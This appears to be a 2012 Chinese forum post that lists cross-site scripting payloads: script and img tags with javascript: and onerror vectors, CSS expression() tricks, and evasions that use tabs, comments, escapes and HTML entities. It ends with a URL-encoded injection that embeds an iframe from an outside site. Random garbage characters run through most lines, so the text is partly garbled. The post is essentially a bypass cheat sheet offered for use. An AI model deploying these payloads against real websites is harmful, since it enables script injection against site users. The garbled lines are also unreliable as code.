<script>alert("跨站")</script> (最常用)
1 I6 ~7 R6 P) `' R" w; O. d<img scr=javascript:alert("跨站")></img>& v* i; y8 ]( z8 h1 X$ L
<img scr="javascript: alert(/跨站/)></img>
' ^( B5 F$ B& {) m9 L7 H<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)# R+ ?0 w6 F8 q$ a9 ]) Y
<img scr="#" onerror=alert(/跨站/)></img>: o0 i" B4 p L, ~$ p' a7 Y$ |
<img scr="#" style="xss:expression(alert(/xss/));"></img>9 c0 e2 N/ n* W9 Q u# P6 J
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)( o5 B8 ^6 G1 w$ i# r
<img src=vbscript:msgbox ("xss")></img>
4 y( h9 s/ A" U% [! l<style> input {left:expression (alert('xss'))}</style>- z t6 r% b8 ]* r9 `8 [ k
<div style={left:expression (alert('xss'))}></div>
- f- d% H/ }% w! B' x8 I( E0 l<div style={left:exp/* */ression (alert('xss'))}></div>& F, V6 _2 h$ ?
<div style={left:\0065\0078ression (alert('xss'))}></div>8 D6 B# `; |! a9 B, ?
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div> T5 L5 e. y) i0 y x$ ~" Y+ [/ H
unicode <div style="{left:expRessioN (alert('xss'))}">
* J# ?7 n4 |8 F9 U; r
! c7 C6 s4 A. c"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["& ]7 N( r. G3 W( W' s6 _
|
发表于 2012-9-13 17:15:04
收藏
支持
反对